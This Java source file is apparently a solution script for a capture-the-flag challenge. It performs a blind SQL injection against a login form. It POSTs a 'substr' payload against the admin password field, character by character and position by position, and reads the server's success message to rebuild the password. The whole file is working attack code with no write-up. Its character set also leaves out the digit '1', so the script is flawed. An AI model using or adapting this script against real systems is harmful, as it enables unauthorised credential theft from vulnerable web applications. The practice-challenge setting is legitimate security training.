SQLInjection.java

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintStream;
import java.net.URL;
import java.net.URLConnection;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

	//SQLTemplate
	//substr("str",position,length);
	//'or substr((select pass from user where id ='admin'),1,1)='F;
public class Main {
	public static void main(String [] args) throws IOException{
		String StrUrl = "http://ctfq.sweetduet.info:10080/~q6/";
		String flag = "";
		String data ="";
		URL	Url  = new URL(StrUrl);
		URLConnection urlc ;
		char[] c = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
					'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','_',
					'0','2','3','4','5','6','7','8','9'};
		

			for(int i=1;i<=21;i++){
				System.out.print(i+"桁目");
				boolean endflag = false;
				for(int j=0;j<c.length;j++){
				if(endflag)break;
				urlc = Url.openConnection();
				urlc.setDoOutput(true);
				//Injection SQL
				data = "id=admin&pass='or substr((select pass from user where id ='admin'),"+i+",1)='"+c[j];
				PrintStream ps = new PrintStream(urlc.getOutputStream());
				ps.print(data);
				ps.close();//Postの書き出し終了
				
				//取得したデータ確認
				BufferedReader br = new BufferedReader(new InputStreamReader(urlc.getInputStream()));
				String txt = "";
				int cc = 0;
				while((txt = br.readLine()) != null){
					cc++;
					if(cc == 9){endflag = check(txt);}
					if(endflag){System.out.println("=>"+c[j]);flag+=c[j];break;}//適合
					
				}
				br.close();
			}
		}
			System.out.print(flag);
	}
	
	
	static boolean check(String text){
		String regex ="Congratulations!<br>";
		Pattern p = Pattern.compile(regex);
		Matcher m = p.matcher(text);
		return m.find();
	}
}